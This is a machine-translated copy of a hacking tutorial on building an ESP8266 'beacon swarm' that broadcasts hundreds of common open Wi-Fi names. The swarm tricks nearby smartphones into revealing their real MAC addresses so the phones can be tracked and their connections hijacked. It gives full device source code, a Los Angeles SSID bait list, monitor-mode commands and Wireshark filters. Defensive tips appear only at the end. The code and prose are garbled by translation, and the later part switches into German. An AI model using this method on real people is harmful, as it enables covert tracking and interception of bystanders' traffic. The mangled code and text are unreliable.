قالب وردپرس درنا توس
Home / Tips and Tricks / How to Use an ESP8266 Beacon Spammer to Track Smartphone Users «Null Byte :: WonderHowTo

How to Use an ESP8266 Beacon Spammer to Track Smartphone Users «Null Byte :: WonderHowTo



Smartphones and laptops are constantly sending Wi-Fi wireless signals, and many of these signals can be used to track us. This guide programs a cheap IoT device in Arduino to create hundreds of fake networks with common names. As a result, nearby devices can display their true, traceable MAC address, and even an attacker can take over the phone's data connection without warning.

Privacy is increasingly difficult to enjoy when your smartphone is constantly recording, transferring, and storing information about you, but many people are unaware that their smartphone transmits, almost unencrypted over Wi-Fi, unencrypted information that you can track. We look at an attack that uncovers and tracks nearby Wi-Fi-enabled devices, thwarting privacy tools such as MAC randomization from manufacturers.

MAC Addresses & Privacy on Smartphones

Tracking users over Wi-Fi on their smartphones is not a new idea. Many large retailers began years ago to track the busiest parts of the store to sell shelf space at a high price for the manufacturers. To protect the privacy of smartphone users, most devices now use random MAC address addressing to make it harder for smartphones and their users to track.

This means that when you search for Wi, you do not need to use the real MAC address of your device ̵

1; networks, if your device uses a fake one to protect your privacy – until it finds a network it trusts. MAC randomization is a big step towards privacy, but in practice it can easily be defeated.

Preferred Network Lists vs. Randomization

The way in which Wi-Fi enabled devices such as smart phones store "open" Wi-Fi networks that the user has previously connected with is a serious security issue. Passwordless networks can easily be faked so that someone can create a fake version. Since smartphones store only the network name or SSID of an open Wi-Fi network and no other information, your laptop is just as happy to connect to a real Google Starbucks network as a fake one. 19659002] This is for convenience. The first time you connect to a network, your device assumes that you trust it, and connects to the network without any permission from that point on. This is also true in places where the original access point might not be found. Your device connects to any network with an appropriate name without asking, which also indicates your true MAC address and may allow an attacker to intercept and modify your traffic.

As Randomization has described in his article on removing the MAC address, this process is part of the way a Wi-Fi connection is made.

Once a device has discovered an AP that advertises an SSID with one of its preferred (configured) networks, it automatically initiates the association process AP. From this point on, most devices that implement MAC address randomization use their real MAC address to connect to the AP.

– Mathy Vanhoef

Previous Attacks and Observations on Wi-Fi Devices

The Karma Attack uses the names of networks contained in broadcasts from the smartphone itself to create a fake access point with the same name , The attacker waits for a nearby device to send a test request asking if a recently connected network is nearby. After the attacker sees the name of the network the device is asking for, he simply creates a fake network with an appropriate name. This allows the victim's device to connect without asking which allows the attacker to take a man-in-the-middle position on the target and control his data connection.

Mathy Vanhoef investigates several methods of attacking MAC randomization, including a fake AP attack with Airbase-ng that was restricted to five false APs. This attack works by creating common network names in the hope that many devices have previously been connected to a network of the same name. If a victim device sees a network name it has previously connected to, it will drop its random fake MAC address and attempt to connect using its real MAC. In Mathy's research, he found that a small number of counterfeit SSIDs were able to unmask a large number of devices. Mathy describes the attack technique as follows:

Existing attacks that heralded SSIDs to obtain victims' association requests, such as the well-known karma attack, were based on the SSIDs that the victim emitted in search queries. However, because modern devices avoid transmitting SSIDs, the karma attack is no longer applicable. Our solution to this problem is to publish a list of popular SSIDs, hoping that at least one of them will be in the victim's preferred network list.

– Mathy Vanhoef

Stefan, aka Space Chicken, specializes in Wi-Fi security projects using the ESP8266 and ESP32 development boards. His Beacon Spammers project was designed to create hundreds of fake APs with customizable names, but because it set the length of each network name to 32 characters by padding the end with blanks, nearby devices could tell the names were not associated with those before and ignored the fake networks.

NodeMCU ESP8266 Development Card. Image of Kody Kinzie / Null Byte

After speaking to Spacehuhn, he modified the Beacon Spammer project to create SSIDs that exactly match the listed devices in their preferred network list (PNL). This modification allows a well-ordered list of common open network names to reveal nearly all nearby devices in a "beacon swarming" attack.

Localized Open SSID Swarm – A Reverse Karma Attack

The basic concept for a localized open SSID swarm attack is to provide the look of many available open networks selected from a list of common open network names that are in the geographic area of ​​a public domain Victim can be found using Wigle Wifi. This fake AP attack causes all nearby devices connected to a network of the same name (SSID) to attempt to connect by revealing their true MAC address and opening a list of open devices An attacker could use these trusted open networks stored on the phone to unmask the target device or connect to the target device by simply creating a spoofed AP with the same name and preventing the victim from connecting to other networks , Once these network names are identified, the attacker can use them to take over the victim's data connection with a MITM attack without warning or prompting on the device.

We have assumed that the most popular SSIDs are open hotspots that do not use encryption. Therefore, the APs we sent were configured as open hotspots. Although airbase-ng supports the creation of multiple SSIDs, our experiments have shown that it does not properly handle a large number of SSIDs. Therefore, we have limited our attack to a reasonable number of SSIDs, ie 5 SSIDs.

– Mathy Vanhoef

Using a modified version of Spacehuhns Beacon Spammer, we can increase the number of announced SSIDs to hundreds. We are improving our chances of finding trusted networks stored on nearby devices. Mathy went on to say that some very popular SSIDs come a long way, which means that many devices will respond to some popular SSIDs. This means swarms of devices with hundreds of popular SSIDs can be over the top, but it should work well.

SSIDs configured in Wi-Fi devices follow a long-tailed distribution, which means that a small number of popular SSIDs are found in many devices

– Mathy Vanhoef
Image via Mathy Vanhoef

It's also worth noting that this behavior is not just an attacker's behind it. If you go to a company with a popular SSID, such as a coffee shop you were previously connected to, your device is trying to connect and delete its fake MAC address.

Usually, this means that you lose data first. Note that you have been automatically connected and logged in to the network. An attacker who is near a real network with a common SSID can also use it to track nearby users without having to create their own network.

What You Need

Following this guide, you will need a computer (obviously) and a NodeMCU or ESP8266 device that cost about $ 6 and are programmed in Arduino, C ++, Lua, or MicroPython can be. These IoT development boards are cheap and easy to program and edit. You can get a generic or one of the official boards from Spacehuhn.

To see and understand what happens, we will use Wireshark, which is cross-platform and included in Kali Linux. For our list of common open SSIDs we will use Wigle Wifi results, sort them and add them to our list of fake APs. You should make sure that you select SSIDs that are common in your area, as this level of detail will improve your results.

For the LA district, I have created a list of common SSIDs formatted for Spacehuhn's code] On Amazon: ESP8266 NodeMCU Development Board for Arduino IDE (3 Pack)

Step 1: Setting up the Arduino IDE

In this guide, we use the free and cross-platform Arduino IDE, which allows us to quickly prototype what we need. Arduino IDE (the IDE stands for "integrated development environment") enables fast writing and uploading of scripts to Arduino-like microcontroller devices.

You can download the Arduino IDE from the official website. Once it's installed, you need to click on the "Arduino" drop-down menu, then select "Settings." Next, paste the following URL into the Additional Board Manager URLs field.

  http://arduino.esp8266.com/stable/package_esp8266com_index.json 

When finished, click OK. Close the menu.

Step 2: Configure the Arduino IDE for the ESP8266

Now you need to add the NodeMCU to the Boards Manager . Click on "Tools" and move the mouse pointer over the "Board" area to display the drop-down list. Click on "Boards Manager" above to open the window where we can add more boards.

When Boards Manager appears, type "esp8266" in the search box. Select "esp8266" from "ESP8266 Community" and install it.

You should now be prepared to program your NodeMCU. Plug your breadboard to your computer where the NodeMCU should already be connected. If you click on "Tools", the correct port should be selected automatically.

Select "NodeMCU 1.0" from the "Board" menu. If you use a faulty cable, the port may not be displayed. If you do not see anything after completing the other steps, try a different cable first.

There are two main buttons above. The checkmark will compile and check our code for errors, and the right arrow will push the code to the NodeMCU.

Step 3: Download Spacehuhn's Beacon Spammer Project

Next, we need to download SpaceHuhn's Beacon Spammer Project. This project is just one of the great things Stefan has created, including these great boards with pre-installed software. Some of these designs also support the addition of custom antennas. So it's worth looking at the hardware side of the project as well. If you'd like to see more of Stefan's projects, visit his website

To download Beacon Spammer, open a terminal and type:

  git clone https://github.com/spacehuhn/esp8266_beaconSpam.git [19659058] Step 4: Open the Beacon Spammer File in the Arduino IDE 

Next we navigate to the folder "esp8266_beaconSpam" and open the folder with the same name. The only file inside is the only thing we need, so open the file "esp8266_beaconSpam.ino" in the Arduino IDE and see what the code looks like. The pre-installed networks have some pretty amazing SSIDs installed, but they do not work for our purposes. First, we need to create a list of network names that we believe are nearby devices responsive to.

Step 5: Prepare and sort list of open SSIDs

Beacon swarming attacks have the best results of open (no password) SSIDs common in this field. If you have an Android phone, you can use Wigle Wifi to walk or drive through your city to gather names for wireless networks.

After the run, you can go to the database menu of Wigle Wifi and tap on the option "CSV export". Next, take the resulting CSV file and upload it to your computer. Open it in Excel or Google Sheets, and then sort the list by encryption type or "AuthMode."

Include all networks with ESS BLE, IBSS, or ESS authentication because these networks do not have passwords. Copy all these network names to a list and you may see a lot of duplicates. To fix this, save it to a text file, and then run the following script to sort by frequency and remove duplicates.

  sort ./yourfile.txt | uniq -c | sort -n 

If you have a list of SSIDs that you want to add to the code, you can use the Python script I've written to format it with the quotes and the newline character that is the beacon spammer Script Required (19659002) Add as many network names as you want to a .txt file with each name in a new line, save it, and then use that program to format. Remember to change the "input file" to the location of the .txt file with the names it contains and "output file" to the name you want to save for the formatted list.

  append = "\ n " "
prepend = "" "
with open (& # 39; ./ inputfile.txt & # 39 ;, & # 39;) as istr:
with open (& # 39; / outputfile.txt & # 39 ;, & # 39; w & # 39;) as ostr:
for line in Istr:
line = (before + line.rstrip (& # 39;) + append)
print (line, file = ostr) 

Now you can copy the network names to the part of the beacon spammer script where you can list the networks you want to create. Here's a list I made for Southern California:

  "JWMarriott_GUEST  n"
"JWMarriott_LOBBY  n"
"LATTC visitors  n"
"LATimes guest  n"
"LAUSD guest  n"
"LAX-C guest"
"McDonald's free WiFi"
"Oh Ranger! Wi-Fi  n"
"Public Health Guest  n"
"SETUP  n"
"Starbucks Wi-Fi  n"
"TWCWiFi  n"
"TWGast  n"
"USC Guest Wireless"
"WHOPPERWIFI  n"
"WLAN-GAST  n"
"attwifi  n"
"belkin.8fa.guests  n"
"Dwcwifi"
"Guest  n"
"hpsetup  n"
"Top Employee  n"
"lacguest  n"
"lascguest  n"
"Linksys  n"
"non-noun"
"wirelesslan  n"
"A_Gäste  n"
"Ace Hotel  n"
"KabelWiFi  n"
"CityofLosAngelesGast  n"
"DHS_Gast  n"
"Guest  n"
"Americas Best Value Inn"
"Amoeba - Guest"
"Budget Inn  n"
"KabelWiFi  n"
"Camden
"CenterWiFi"
"CoffeeBeanWifi  n"
"Comfort Inn"
"Cricket guest  n"
"DaysInnOnline"
"Dennys_Guest_WIFI  n"
"FBI SurveillanceVan  n"
"Google Starbucks"
"Guest  n"
"Guest T-Mobile  n"
"Guest phone"
"Hazelitas Guest"
"Hollywood Guest Inn"
"Hollywood Palms Inn & Suites"
"Jacks_Gast  n"
"LAFILM guest  n"
"LAUSD guest  n"
"McDonald's free WiFi"
"Moment Hotel"
"Netflix  n"
"PATH Wifi  n"
"Paulist guest  n"
"Philz Coffee"
"Rodeway Inn"
"Roosevelt"
"Sahara Motor Hotel  n"
"Sand House Wi-Fi  n"
"Employee  n"
"Starbucks Wi-Fi  n"
"Stella Barra Guest"
"Students  n"
"Sunset 8 motel"
"THEMELT  n"
"TWCWiFi  n"
"Delicate greens  n"
"URBAN_GUEST_WIFI  n"
"WK guest  n"
"WL-GUEST  n"
"Wendys_Gast  n"
"WhopperWifi  n"
"WlanVPN  n"
"Admin guest  n"
"att-wifi  n"
"ihop 5G guest  n"
"ihop-Guest  n" 

Step 6: Change the Beacon Spammers and press the NodeMCU

We need to change the default settings for the Beacon Spammers to ensure the desired behavior. To do this, we refer to the convenient configuration settings at the beginning of the code in the .INO file that we downloaded earlier.

  / ===== Settings ===== //
const uint8_t channels [] = {1, 6, 11}; // used WLAN channels (available: 1-14)
const bool wpa2 = false; // WPA2 networks
const bool appendSpaces = true; // makes all SSIDs 32 characters long to improve performance 

To track replies to our spoofed networks, reduce the number of channels to send to only one channel. You can select the desired channel, but if you are broadcasting on multiple channels, you will not be able to monitor devices that respond to the spoofed networks. Some research suggests that Channel 4 is the best channel for it.

After changing the list of networks to contain only one, keep the variable "wpa2 = false". As a result, devices see our fake networks as "open" networks without a password.

Next, SpaceHuhn has added a handy option to enable our attack by disabling a feature that makes all SSIDs the same length. Change "atdendspaces" to false so that SSIDs that we add to our list are exactly the same as those sent by the Beacon Spammer. If you forget this, the networks it creates will not be considered as containing the SSIDs stored in nearby devices because the length is always set to 32 characters.

Last, add the network names you want to create, double quotes around it, and a new row character at the end of each. Your modified code should look like this.

  / *
============================================
Copyright (c) 2018 Stefan Kremser
github.com/spaceHuhn
============================================
* /

// ===== Settings ===== //
const uint8_t channels [] = {1}; // used WLAN channels (available: 1-14)
const bool wpa2 = false; // WPA2 networks
const bool appendSpaces = false; // makes all SSIDs 32 characters long to improve performance

/ *
SSIDs:
- Do not forget that at the end of each SSID!
- Max. 32 characters per SSID
- do not add duplicates! You must change at least one character
* /
const char ssids [] PROGMEM = {
"JWMarriott_GUEST  n"
"JWMarriott_LOBBY  n"
"LATTC visitors  n"
"LATimes guest  n"
"LAUSD guest  n"
"LAX-C guest"
"McDonald's free WiFi"
"Oh Ranger! Wi-Fi  n"
"Public Health Guest  n"
"SETUP  n"
"Starbucks Wi-Fi  n"
"TWCWiFi  n"
"TWGast  n"
"USC Guest Wireless"
"WHOPPERWIFI  n"
"WLAN-GAST  n"
"attwifi  n"
"belkin.8fa.guests  n"
"Dwcwifi"
"Guest  n"
"hpsetup  n"
"Top Employee  n"
"lacguest  n"
"lascguest  n"
"Linksys  n"
"non-noun"
"wirelesslan  n"
"A_Gäste  n"
"Ace Hotel  n"
"KabelWiFi  n"
"CityofLosAngelesGast  n"
"DHS_Gast  n"
"Guest  n"
"Americas Best Value Inn"
"Amoeba - Guest"
"Budget Inn  n"
"KabelWiFi  n"
"Camden
"CenterWiFi"
"CoffeeBeanWifi  n"
"Comfort Inn"
"Cricket guest  n"
"DaysInnOnline"
"Dennys_Guest_WIFI  n"
"FBI SurveillanceVan  n"
"Google Starbucks"
"Guest  n"
"Guest T-Mobile  n"
"Guest phone"
"Hazelitas Guest"
"Hollywood Guest Inn"
"Hollywood Palms Inn & Suites"
"Jacks_Gast  n"
"LAFILM guest  n"
"LAUSD guest  n"
"McDonald's free WiFi"
"Moment Hotel"
"Netflix  n"
"PATH Wifi  n"
"Paulist guest  n"
"Philz Coffee"
"Rodeway Inn"
"Roosevelt"
"Sahara Motor Hotel  n"
"Sand House Wi-Fi  n"
"Employee  n"
"Starbucks Wi-Fi  n"
"Stella Barra Guest"
"Students  n"
"Sunset 8 motel"
"THEMELT  n"
"TWCWiFi  n"
"Delicate greens  n"
"URBAN_GUEST_WIFI  n"
"WK guest  n"
"WL-GUEST  n"
"Wendys_Gast  n"
"WhopperWifi  n"
"WlanVPN  n"
"Admin guest  n"
"att-wifi  n"
"ihop 5G guest  n"
"ihop guest  n"
};
// ====================== //

// ===== Contains ===== //
#include 

external "C" {
#include "user_interface.h"
typedef void (* freedom_outside_cb_t) (uint8 status);
int wifi_register_send_pkt_freedom_cb (freedom_outside_cb_t cb);
void wifi_unregister_send_pkt_freedom_cb (void);
int wifi_send_pkt_freedom (uint8 * buf, int len, bool sys_seq);
}
// ====================== //

// runtime variables
char emptySSID [32];
uint8_t channelIndex = 0;
uint8_t macAddr [6];
uint8_t wifi_channel = 1;
uint32_t currentTime = 0;
uint32_t packetSize = 0;
uint32_t packetCounter = 0;
uint32_t attackTime = 0;
uint32_t packetRateTime = 0;

// beacon frame definition
uint8_t beaconPacket [109] = {
/ * 0 - 3 * / 0x80, 0x00, 0x00, 0x00, // Type / subtype: Management Beacon Frame
/ * 4 - 9 * / 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, // Destination: Broadcast
/ * 10 - 15 * / 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source
/ * 16 - 21 * / 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // Source

// fixed parameters
/ * 22 - 23 * / 0x00, 0x00, // fragment and sequence number (handled by the SDK)
/ * 24 - 31 * / 0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00, // timestamp
/ * 32 - 33 * / 0xe8, 0x03, // Interval: 0x64, 0x00 => every 100ms - 0xe8, 0x03 => every 1s
/ * 34 - 35 * / 0x31, 0x00, // skills Tnformation

// Marked parameters

// SSID parameter
/ * 36 - 37 * / 0x00, 0x20, // day: set SSID length, day length: 32
/ * 38 - 69 * / 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, // SSID

// Supported prices
/ * 70 - 71 * / 0x01, 0x08, // Day: Supported prices, length of day: 8
/ * 72 * / 0x82, // 1 (B)
/ * 73 * / 0x84, // 2 (B)
/ * 74 * / 0x8b, // 5.5 (B)
/ * 75 * / 0x96, // 11 (B)
/ * 76 * / 0x24, // 18
/ * 77 * / 0x30, // 24
/ * 78 * / 0x48, // 36
/ * 79 * / 0x6c, // 54

// Current channel
/ * 80 - 81 * / 0x03, 0x01, // channel set, length
/ * 82 * / 0x01, // Current channel

// RSN information
/ * 83 - 84 * / 0x30, 0x18,
/ * 85 - 86 * / 0x01, 0x00,
/ * 87 - 90 * / 0x00, 0x0f, 0xac, 0x02,
/ * 91 - 92 * / 0x02, 0x00,
/ * 93 - 100 * / 0x00, 0x0f, 0xac, 0x04, 0x00, 0x0f, 0xac, 0x04, / * Fix: Changed 0x02 (TKIP) to 0x04 (CCMP) is default. WPA2 with TKIP is not supported by many devices * /
/ * 101 - 102 * / 0x01, 0x00,
/ * 103 - 106 * / 0x00, 0x0f, 0xac, 0x02,
/ * 107 - 108 * / 0x00, 0x00
};

// goes to the next channel
void nextChannel () {
if (sizeof (channels)> 1) {
uint8_t ch = channels [channelIndex];
channelIndex ++;
if (channelIndex> sizeof (channels)) channelIndex = 0;

if (ch! = wifi_channel && ch> = 1 && ch <= 14) {
wifi_channel = ch;
wifi_set_channel (wifi_channel);
}
}
}

// generates random MAC
void randommak () {
for (int i = 0; i <6; i ++)
macAddr [i] = random (256);
}

void setup () {
// create an empty SSID
for (int i = 0; i <32; i ++)
emptySSID [i] = & # 39; & # 39 ;;

// random
randomSeed (os_random ());

// set packetSize
packetSize = size of (beaconPacket);
if (wpa2) {
beaconPacket [34] = 0x31;
otherwise {
beaconPacket [34] = 0x21;
packetSize - = 26;
}

// create random MAC address
randomMac ();

// start serial
Start of series (115200);
Serial.println ();

// get time
currentTime = millis ();

// start WLAN
WiFi.mode (WIFI_OFF);
wifi_set_opmode (STATION_MODE);

// set the channel
wifi_set_channel (channels [0]);

// print out printed SSIDs
Serial.println ("SSIDs");
int i = 0;
int len ​​= size of (SSIDs);
while (i < len){
    Serial.print((char)pgm_read_byte(ssids + i));
    i++;
  }

  Serial.println();
  Serial.println("Started \o/");
  Serial.println();
}

void loop() {
  currentTime = millis();

  // send out SSIDs
  if (currentTime - attackTime > 100) {
attackTime = currentTime;

// temporary variables
int i = 0;
int j = 0;
int ssidNum = 1;
char tmp;
int ssidsLen = strlen_P (SSIDs);
bool sent = false;

// go to the next channel
nextChannel ();

while (i <ssidsLen) {
// read out next SSID
j = 0;
do {
tmp = pgm_read_byte (ssids + i + j);
j ++;
} while (tmp! = & # 39; && j <= 32 && i + j <ssidsLen);

uint8_t ssidLen = j - 1;

// set the MAC address
macAddr [5] = ssidNum;
ssidNum ++;

// write the MAC address in the beacon frame
memcpy (& beaconPacket [10] macAddr, 6);
memcpy (& beaconPacket [16] macAddr, 6);

// reset SSID
memcpy (& beaconPacket [38] blank SSID, 32);

// write a new SSID in the beacon frame
memcpy_P (& beaconPacket [38] & ssids [i] ssidLen);

// set channel for beacon frame
beaconPacket [82] = wifi_channel;

// send package
if (appendSpaces) {
for (int k = 0; k <3; k ++) {
packetCounter + = wifi_send_pkt_freedom (beaconPacket, packetSize, 0) == 0;
Delay (1);
}
}

// remove spaces
otherwise {

uint16_t tmpPacketSize = (packetSize - 32) + ssidLen; // Calculation size
uint8_t * tmpPacket = new uint8_t [tmpPacketSize]; // create package buffers
memcpy (& tmpPacket [0] & beaconPacket [0] 38 + ssidLen); // Copy the first half of the package to the buffer
tmpPacket [37] = ssidLen; // update SSID length byte
memcpy (& tmpPacket [38 + ssidLen] & beaconPacket [70] wpa2? 39: 13); // copy the second half of the package into the buffer

// send package
for (int k = 0; k <3;k++){
          packetCounter += wifi_send_pkt_freedom(tmpPacket, tmpPacketSize, 0) == 0;
          delay(1);
        }

        delete tmpPacket; // free memory of allocated buffer
      }

      i += j;
    }
  }

  // show packet-rate each second
  if (currentTime - packetRateTime > 1000) {
packetRateTime = currentTime;
Serial.print ("Packages / s:");
Serial.println (packetCounter);
packetCounter = 0;
}
} 

Step 7: Open Wireshark, Set Channel and Filter

Next you need to open Wireshark and prepare for the answers to our "bait" networks. I aired mine on Channel 1, so in Wireshark we need to be sure we're looking for traffic on the same channel.

If you are using Kali Linux, select the network adapter that you use from the list of available network interfaces displayed after running ifconfig .

Next, run the following command to put your network adapter into monitor mode and set the channel to 1 card should be named something like wlan0 or wlan1. Be sure to change the name of the adapter to match the one in the code below.

  sudo airmon-ng start wlan0 1 

Now your adapter should be in monitoring mode and you should hear channel 1. Open Wireshark and select the network adapter that you put into monitor mode and start it. The capturing process will begin.

If you need help launching Wireshark, you can read our guide.

Step 8: Finding Trial and Authentication Requests

It is immediately apparent that there is a lot of data transmitted through the Aether Waves. We need to filter this to understand what is going on in any useful way. First let's use a display filter to get rid of additional information that we do not need to see. The screen should be flooded with beacon beacons and any other local network traffic.

Our ultimate goal is exploratory inquiries directed to the fake networks we have created or attempt to authenticate. We can search for them using the following filters:

To search for probe responses, we can enter this filter in the capture filter bar above.

  wlan.fc.type_subtype == 0x000b 

Here we can see devices trying to join nearby networks.

Als nächstes können wir nach Sondenanforderungen mit dem folgenden Filter suchen.

 wlan.fc.type_subtype == 0x0004 

Dies sind Geräte in der Nähe, die nach bestimmten Netzwerken rufen. Hier können wir zusätzliche Informationen sehen, einschließlich der spezifischen Geräte in der Nähe, auf die Geräte zugreifen. Broadcast bedeutet, dass es an alle und niemanden im Besonderen gesendet wird, aber wir können hier sehen, dass viele zu unseren gefälschten Netzwerken gesendet werden.

Schritt 9: Filtersuche nach den ersten 3 MAC Octets

Die beste Art zu schauen Verkehr zu und von unserem Beacon Spammer ist mit den Anzeigefiltern "Senderadresse" und "Zieladresse". Für Pakete, die von unserem Beacon Spammer gesendet werden, verwenden wir den Senderadressfilter.

Beachten Sie, dass sich die ersten drei Oktette der MAC-Adresse von Beacon-Spammer-Paketen nicht ändern. Wir werden dies ausnutzen, indem wir einen Filter erstellen, der nur Frames anzeigt, die an den Beacon-Spammer gesendet werden.

 wlan.da [0:3] == xx: xx: xx 

Dieser Capture-Filter sollte alle Geräte auflisten, die zurückrufen zu dem Schwarm von gefälschten APs

Dies ist nicht die Grenze dieser Technik, aber wir werden hier für dieses Beispiel aufhören. Jedes der Netzwerke, die ein Gerät anruft, kann erstellt werden, um die Datenverbindung dieses Geräts zu erfassen. Verwenden Sie Ihre Vorstellungskraft!

Was Sie tun können, um Tracking zu verhindern

Um diese Art des Trackings zu verhindern, ist der gängigste Ansatz, Ihr WLAN auf Ihrem Gerät auszuschalten, wenn Sie es nicht verwenden es. Dadurch werden die Wi-Fi-Übertragungen von Ihrem Telefon nicht stummgeschaltet, da eine Funktion namens AGPS (Assisted GPS) weiterhin nach Netzwerken in der Nähe sucht, um Ihren Standort zu ermitteln. Um dies zu verhindern, können Sie GPS mit hoher Genauigkeit deaktivieren oder den Flugzeugmodus aktivieren, wenn Sie wirklich möchten, dass Ihr WLAN keine Daten mehr verliert.

Eine weitere wichtige und praktischere Methode zur Verhinderung eines solchen Angriffs besteht darin, offene Netzwerke immer zu löschen das sind auf Ihrem Computer gespeichert. Die automatische Verbindungsfunktion wurde so entwickelt, dass sie bequem ist. Mit einem Kennwort im Netzwerk ist es möglicherweise nicht so schlimm. Wenn es jedoch zu offenen Netzwerken kommt, ist es für einen Angreifer ganz einfach, eine Liste offener Netzwerke zu finden, mit denen sich das Gerät verbinden wird. Dies funktioniert bei einem WPA2-Netzwerk nicht auf die gleiche Weise. Wenn Sie also Netzwerke löschen, die Sie nicht benötigen, kann Ihr Gerät nicht mehr auf die gefälschten Access Points reagieren.

Ich hoffe, Ihnen hat diese Anleitung zum Entschlüsseln und Verfolgen von Wi-Fi gefallen. Fi-Geräte mit dem Beacon Spammer! Wenn Sie Fragen zu diesem Lernprogramm zur WLAN-Verfolgung haben oder einen Kommentar haben, können Sie mich auf Twitter erreichen @KodyKinzie .

Nicht verpassen: Deaktivieren Sie Sicherheitskameras auf Jedes kabellose Netzwerk mit Aireplay-ng

Titelbild und Screenshots von Kody / Null Byte




Source link